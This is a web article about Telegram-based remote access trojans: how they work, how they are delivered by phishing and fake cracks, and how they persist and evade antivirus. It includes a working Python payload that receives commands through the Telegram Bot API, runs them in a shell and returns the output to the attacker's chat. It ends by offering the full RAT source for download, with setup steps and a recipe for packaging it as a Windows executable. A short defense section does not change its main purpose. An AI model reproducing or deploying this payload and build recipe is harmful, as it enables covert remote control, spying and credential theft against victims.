darkdfolder logo
Register | Login
Register | Login

Telegram RAT: What is It and How Does It Work?

Telegram Rat

What is Telegram RAT?

Telegram Remote Access Tool (Telegram RAT) is a type of malware that allows an attacker to remotely control an infected computer using Telegram, a popular messaging app. Unlike traditional RATs that use custom command and control (C2) servers, Telegram RAT leverages Telegram’s official Bot API to send commands and receive data through Telegram’s encrypted network.

This approach makes the RAT hard to detect and block because the communication blends with legitimate Telegram traffic, which is typically allowed on most networks and not flagged by firewalls or antivirus software.

How Does Telegram RAT Work?

Basic Architecture

Telegram RAT consists of two main components:

  • Telegram Bot: The attacker sets up a bot via Telegram’s BotFather, obtaining an API token. This bot serves as the attacker’s interface to send commands and receive data.
  • Client Payload: The malware installed on the victim’s machine that communicates with the Telegram bot via the API. It polls for commands, executes them, and sends back results.

Communication Flow

The payload periodically queries Telegram’s API for new messages (commands) sent to the bot. Upon receiving commands, it executes them locally on the victim machine and sends the output back via messages or file uploads to the Telegram chat controlled by the attacker.

Because the communication goes through HTTPS and Telegram’s trusted servers, it is encrypted and difficult to intercept or block.

Deployment Methods

Telegram RAT can be delivered via:

  • Malicious email attachments or links (phishing).
  • Fake software downloads or cracks.
  • Social engineering and USB drops.
  • Exploiting vulnerabilities in software or systems.

Once executed, the payload immediately gathers system information and establishes communication with the attacker’s Telegram bot.

Key Functionalities of Telegram RAT

Remote Command Execution

The attacker can send commands such as running shell scripts or system commands. For example, commands to list directories, kill processes, or modify system settings.

File Management

Download files from the victim’s machine or upload malicious files. This allows exfiltration of sensitive data or further infection.

Screen and Webcam Capture

The RAT can take screenshots or record webcam images to spy on the victim.

Audio Recording

Record audio from the microphone for eavesdropping.

Keylogging and Clipboard Monitoring

Capture keystrokes and clipboard data to steal credentials or personal information.

Persistence Mechanisms

Install itself to run on startup by modifying registry keys, scheduled tasks, or system services.

Self-Destruct and Anti-Forensic Capabilities

Delete itself and logs on command to hide evidence.

Technical Details and Code Example

Here’s a simplified Python snippet showing how the payload might communicate with the Telegram Bot API:

import requests
import subprocess

BOT_TOKEN = 'YOUR_BOT_TOKEN'
CHAT_ID = 'YOUR_CHAT_ID'

def send_message(text):
    url = f'https://api.telegram.org/bot{BOT_TOKEN}/sendMessage'
    data = {'chat_id': CHAT_ID, 'text': text}
    requests.post(url, data=data)

def get_updates(offset=None):
    url = f'https://api.telegram.org/bot{BOT_TOKEN}/getUpdates'
    params = {'offset': offset} if offset else {}
    response = requests.get(url, params=params).json()
    return response['result']

def execute_command(command):
    try:
        result = subprocess.check_output(command, shell=True, stderr=subprocess.STDOUT, universal_newlines=True)
    except subprocess.CalledProcessError as e:
        result = e.output
    return result

def main():
    offset = None
    send_message('Telegram RAT deployed and active.')
    while True:
        updates = get_updates(offset)
        for update in updates:
            offset = update['update_id'] + 1
            if 'message' in update and 'text' in update['message']:
                command = update['message']['text']
                output = execute_command(command)
                send_message(f'Command: {command}\nOutput:\n{output}')

if __name__ == '__main__':
    main()

This code:

  • Connects to Telegram via the Bot API.
  • Checks for new commands.
  • Executes commands on the local system.
  • Sends back the output.

Persistence Techniques

On Windows

  • Adding registry entries to HKCU\Software\Microsoft\Windows\CurrentVersion\Run to execute the payload on startup.
  • Creating scheduled tasks that trigger on login.
  • Using Windows services for advanced persistence.

On Linux

  • Adding scripts to cron jobs.
  • Creating systemd service files.
  • Modifying .bashrc or .profile for user-level persistence.

How Telegram RAT Evades Antivirus

  • Encrypted Communication: Traffic blends with legitimate Telegram HTTPS requests.
  • No Open Ports: Uses outbound HTTPS requests, avoiding suspicious listening ports.
  • Code Obfuscation: Uses obfuscated or packed code to bypass signature detection.
  • Polymorphism: Frequently changes payload signatures.
  • Sandbox Detection: Checks for virtual environments to avoid analysis.

How to Detect and Defend Against Telegram RAT

  • Monitor outgoing Telegram traffic on unusual endpoints or devices.
  • Use advanced behavioral antivirus that detects suspicious activity like remote shell execution.
  • Employ application whitelisting to prevent unauthorized executables.
  • Educate users on phishing and suspicious files.
  • Regularly audit system persistence points (registry, scheduled tasks).

Conclusion

Telegram RATs are a potent and stealthy tool in the hands of attackers. By leveraging Telegram’s API, they hide in plain sight within encrypted, trusted traffic, complicating detection and prevention. A strong defense requires technical awareness, layered security, and continuous monitoring.

You can download the full source code of the Telegram RAT from the link below:

Download Telegram Remote Source Code

Installation and Setup Instructions

Installation and Setup Instructions

To run the Telegram RAT on your system, please follow these steps carefully:

Modify the Bot Token in the Code:
Before running the code, open the main file (e.g., telegram_rat.py) in a text editor. At the top of the code, replace the value of the BOT_TOKEN variable with your own Telegram bot token obtained from BotFather:

Install Python:
First, you need to install Python on your system. You can download the latest version of Python from the official website:
https://www.python.org/downloads/
During installation, make sure to check the option “Add Python to PATH”.

Modify the Bot Token in the Code:
Before running the code, open the main file (e.g., telegram_rat.py) in a text editor. At the top of the code, replace the value of the BOT_TOKEN variable with your own Telegram bot token obtained from BotFather:

BOT_TOKEN = 'YOUR_BOT_TOKEN_HERE'

Optional: Create a Windows Executable (.exe):
If you want to create a standalone Windows executable, first install PyInstaller:

pip install pyinstaller

Then build the .exe file with this command:

pyinstaller --onefile telegram_rat.py

The executable will be generated in the dist folder and can be run on Windows without installing Python.

Website Owner Website
Related Articles
0 0 votes
Article Rating
Subscribe
Notify of
guest
0 Comments
Oldest
Newest Most Voted
Inline Feedbacks
View all comments